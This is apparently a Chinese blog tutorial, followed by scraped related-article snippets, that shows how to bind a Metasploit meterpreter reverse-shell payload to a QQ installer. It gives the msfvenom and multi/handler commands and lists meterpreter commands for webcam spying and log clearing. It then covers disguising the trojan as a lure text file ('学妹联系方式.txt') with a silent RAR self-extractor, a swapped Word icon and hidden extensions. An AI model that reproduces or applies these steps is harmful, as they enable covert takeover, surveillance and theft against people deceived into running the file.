msfconsole捆绑木马

article/2025/9/29 13:49:19

捆绑木马

这里使用的是Kali linux虚拟机
攻击机ip是192.168.0.108
靶机ip是192.168.177.134

生成木马文件

首先上传一个正常的安装包到kali里面

我这里下了一个QQ

把它上传到了root路径下

然后开始捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

-p:指定后面的payload

windows/meterpreter/reverse_tcp:申明这是一个windows系统下的一个反弹tcp

LHOST=192.168.0.108,:设置反弹回来的ip,即你的kali的ip地址

还可以设置返回的端口,这里就不设置了,默认返回端口是4444

-f: 代表要捆绑的文件类型,这里是一个exe文件

-x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe

-o:指定生成的木马文件的路径及文件名,这里我把它保存在原路径里,名字就叫QQ.exe
生成完毕

附:msfvenom介绍
msfvenom简介
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
msfvenom重要参数:(可以使用msfvenom -h查看所有参数)
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式

msfvenom生成

生成payload,有有两个必须的选项:-p-f
使用-p来指定要使用的payload。

./msfvenom –l payloads      //查看所有msf可用的payload列表

使用-f来指定payload的输出格式

./msfvenom -p windows/meterpreter/bind_tcp -f exe
./msfvenom --help –formats      //查看msf支持的输出格式
一个典型的msfvenom使用举例如下:

$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f  exe -o /tmp/my_payload.exe
exploit/multi/handler模块简介

msf>use exploit/multi/handler
#使用exploit/multi/handler监听连入的backdoor
msf exploit(handler)>set payload windows/meterpreter/reverse_http
#设置对应的payload。
Msf exploit(handler)>show options
#显示所有的设置如果需要的话,可能还需要将LHOST,LPORT,设置成与payload中相同的地址和端口。
设置监听反弹

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

发送木马

接下来将木马文件发送给目标,至于怎么让目标信任你,安装你发过去的文件。就看你的社工能力了。
作为一个遵守中华人民共和国网络安全法的四有青年,我当然是选择把木马文件发送到另一台windows系统的虚拟机里面。

先将木马文件发到物理机上,然后再从物理机上传到虚拟机上

然后双击运行QQ
kali就已经连接到了靶机

附:Meterpreter常用命令

info                    #查看已有模块信息
getuid                  #查看权限
getpid                  #获取当前进程的pid
sysinfo                 #查看目标机系统信息
ps                      #查看当前活跃进程
kill <PID值>            #杀死进程
reboot / shutdown       #重启/关机shell #进入目标机cmd shell 
webcam_list             #查看摄像头
webcam_snap             #通过摄像头拍照
webcam_stream           #通过摄像头开启视频
execute                 #在目标机中执行文件execute -H -i -f 
cmd.exe                 #创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值>         #将Meterpreter会话移植到指定pid值进程中
clearav                 #清除windows中的应用程序日志、系统日志、安全日志
enumdesktops            #查看可用的桌面
getdesktop              #获取当前meterpreter 关联的桌面
set_desktop             #设置meterpreter关联的桌面 -h查看帮助
screenshot              #截屏
use espia               #或者使用espia模块截屏 然后输入screengrab
run vnc                 #使用vnc远程桌面连接
进一步获取权限

shell
目标主机就是你的了

 

如果对方就是不下载安装你发的文件怎么办?
RAR有一个自解压的功能
我们可以利用这一点来达到目的
有两个文件,一个是刚刚生成的木马文件,一个是一个txt文档
全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式

 

常规里面

文件名可以是一个诱惑性的,比如学妹联系方式.txt,这里的txt不是文件类型,是文件名的一部分,它的文件类型还是exe
压缩格式RAR,选择创建自解压格式压缩文件

高级选项中,有个自解压选项

 

选中它
常规:解压路径随便填一个,这里放在C盘根目录

 

设置:解压前运行txt文件,解压后运行QQ.exe文件 

模式:解压时隐藏所有信息

 

然后确定,确定,再确定

就会解压出一个名为学妹联系方式的文件

将这个文件发出去

同样设置监听反弹,与第一部分一样

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

当打开这个文档时,显示的是txt文件里的内容,但是QQ.exe也暗中执行了。
当然,实际情况中得换一个轻量级的文件,否则别人看到一个txt文件有80多mb,肯定会怀疑的。

伪装
如何伪装的更像一点呢?
这里以QQ.exe举例

介绍两个工具

BeCyIconGrabber,这个工具可以提取文件图标。
这里提取了一个word文档的图标

Resource Hacker
这个工具能修改文件图标
将它的图标换成word文档的图标

 

这是更改图标后与更改前的区别

 

因为需要管理员权限才能执行,所以多了个盾牌的标记。
换成其它的文件就能避免出现此类情况

当然,因为微软默认是隐藏后缀名的,一般情况下非专业人士都不会修改成显示后缀名的。所以一般情况下被攻击者看不到后缀的。如下图:

但是,万一被攻击者显示后缀名了呢?

 

也有办法伪装
把文件名取得长一点,windows就会只显示一部分内容,将后面部分的文件名隐藏。如下:

 

 

 

 

 

 

 

 

 


http://chatgpt.dhexx.cn/article/jDflCQsB.shtml

相关文章

msfconsole 控制台使用和操作

Msfconsole提供了一个一体化的集中控制台。通过msfconsole&#xff0c;你可以访问和使用所有的metasploit的插件&#xff0c;payload&#xff0c;利用模块&#xff0c;post模块等等。Msfconsole还有第三方程序的接口&#xff0c;比如nmap&#xff0c;sqlmap等&#xff0c;可以直…

Msfconsole的基本使用

WIN XP ms12_020 复现 msfconsolesearch 查找模块use 装载模块winxp ip &#xff1a;192.168.186.133set RHOST 设置目标主机run 执行攻击目标蓝屏死机 重启常用命令show exploits 列出metasploit框架中的所有渗透攻击模块show payloads 列出metasploit框架中的所有攻击载荷sh…

metasploit msfconsole 命令参数

在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习&#xff0c;但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole&#xff0c;你可以访问和使用所有…

使用msfconsole常见问题解决

问题总结&#xff1a; &#xff08;其中有我遇到的问题&#xff0c;有我没有遇到的&#xff0c;但我这里总结了一下别人遇到的&#xff0c;未雨绸缪&#xff09;问题一&#xff08;这个我也遇到过&#xff0c;不过我安装了上面的win 32就没问题了&#xff09;&#xff1a;原因…

msfconsole的简单使用

文章目录 前言一、入侵步骤ps之后通过学习了解了内网穿透 二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架&#xff08;MSF3.4&#xff09;包含3功能模块&#xff1a;msfconsole、msfweb、msfupdate。msfupdat…

msfconsole的使用,MSF17-010(虚拟机)的实验

一.介绍永恒之蓝: 二.环境 宿主机kali: IP地址 靶机win7: IP地址 然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通. 三.msfconsole的使用 1.输入命令msfconslole使用msf框架 2.search MSF17-010 搜索相关脚本 …

【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

目录 一、简介&#xff1a; 二、下载&#xff1a; 2.1、kali 2.2、官网&#xff1a; 2.3、GitHub&#xff1a; 三、启动方法 四、msf常用基础命令 五、msf结构 六、 核心命令&#xff1a; 一、简介&#xff1a; 很容易地获取、开发并对计算机软件漏洞实施攻击 附带数百…

kali msfconsole命令详解以及靶机攻破实战

一.msfconsole介绍 msfconsole简称msf是一款常用的渗透测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种渗透文件&#xff0c;利用网站&#xff0c;手机等的漏洞将到目标靶机&#xff0c;操控目标靶机…这边仅供学习使用 msfconsole注&#xff1a;默认kali 预装了met…

内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

Msfconsole工具 概括&#xff1a; Msfconsole简称&#xff08;msf&#xff09;是一款常用的渗透测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种木马&#xff0c;方便于安全测试人员的使用. 目录&#xff1a; Msfconsole的使用&#xff1a; 第一步&#xff1a;进行端…

SSO是什么?CAS是什么?

SSO SSO是目前比较流行的服务于企业业务整合的解决方案之一&#xff0c; SSO 使得在多个应用系统中&#xff0c;用户只需要 登录一次 就可以访问所有相互信任的应用系统。 CAS CAS 是 Yale 大学发起的一个企业级的、开源的项目&#xff0c;旨在为 Web 应用系统提供一种可靠的…

什么是CAS?

CAS 是 Yale &#xff08;耶鲁&#xff09;大学发起的一个开源项目&#xff0c;旨在为 Web 应用系统提供一种可靠的单点登录方法&#xff0c;CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目。CAS 具有以下特点&#xff1a; 【1】开源的企业级单点登录解决方案。 【2】CAS S…

什么是CAS和AQS

什么是CAS和AQS CAS理解概念ABA 问题 AQS理解获取同步状态AQS源码分析获取锁释放锁 CAS是一种乐观锁&#xff0c;通过在修改数据时&#xff0c;通过和原来的值进行比较&#xff0c;判断是否有被其他人改变。然后AQS是有一个对列&#xff0c;当线程获取不到锁的时候&#xff0c;…

cas 计算器 android,GeoGebra CAS计算器

GeoGebra CAS计算器app是一款非常不错的几何cas计算工具&#xff0c;支持精确解,展开,分解因式等计算功能&#xff0c;图形分解解析&#xff0c;坐标轴&#xff0c;曲线&#xff0c;参数信息详细&#xff0c;需要的可以下载GeoGebra CAS计算器app使用&#xff01; 软件简介 求解…

【Java里的CAS机制】什么是CAS,CAS机制

CAS 一、什么是CAS二、CAS的三大缺点ABA问题 一、什么是CAS 前面两篇文章提到CAS操作&#xff0c;那么CAS操作到底是什么东西呢&#xff1f;今天我们来了解一下CAS机制 CAS&#xff08;Compare-And-Swap&#xff09;,它是一条CPU并发原语&#xff0c;用于判断内存中某个位置的…

CAS机制是什么?

首先我们需要了解为什么有CAS机制的存在&#xff1f;那我们就不得不先知道互斥同步和非阻塞同步。 互斥同步 互斥同步面临的主要问题是进行线程阻塞和唤醒带来的性能开销&#xff0c;因此这种同步也叫阻塞同步。互斥同步属于悲观的并发策略&#xff0c;其总是认为只要不做同步…

CAS单点登录

简介 CAS是Central Authentication Service的缩写&#xff0c;中央认证服务&#xff0c;一种独立开放指令协议。CAS 是 耶鲁大学&#xff08;Yale University&#xff09;发起的一个开源项目&#xff0c;旨在为 Web 应用系统提供一种可靠的单点登录方法&#xff0c;CAS 在 200…

什么是CAS(乐观锁)

本文讲解CAS机制&#xff0c;主要是因为最近准备面试题&#xff0c;发现这个问题在面试中出现的频率非常的高&#xff0c;因此把自己学习过程中的一些理解记录下来&#xff0c;希望能对大家也有帮助。 什么是悲观锁、乐观锁&#xff1f;在java语言里&#xff0c;总有一些名词看…

CAS机制

文章目录 1、什么是CAS&#xff1f;2、CAS实现原子操作的3大问题&#xff1f;3、Unsafe类4、AtomicReference5、CAS——自旋锁 1、什么是CAS&#xff1f; CAS的全称是 Compare And Swap&#xff08;比较再交换&#xff0c;确切一点称之为&#xff1a;比较并且相同再做交换&…

Java 中 CAS 是什么,有哪些实际应用场景

CAS 是什么 CAS&#xff08;Compare And Swap&#xff09;是一种并发编程中的原子操作&#xff0c;用于实现多线程之间的同步。在 Java 中&#xff0c;CAS 操作通过 sun.misc.Unsafe 类实现。 CAS 操作是一种乐观锁机制&#xff0c;它假设对于共享变量的修改操作不会引起冲突…

Java 什么是 CAS? 通俗易懂

Java 并发机制实现原子操作有两种&#xff1a; 一种是锁&#xff0c;一种是CAS。 CAS是Compare And Swap&#xff08;比较并替换&#xff09;的缩写。 java.util.concurrent.atomic中的很多类&#xff0c;如&#xff08;AtomicInteger AtomicBoolean AtomicLong等&#xff09;都…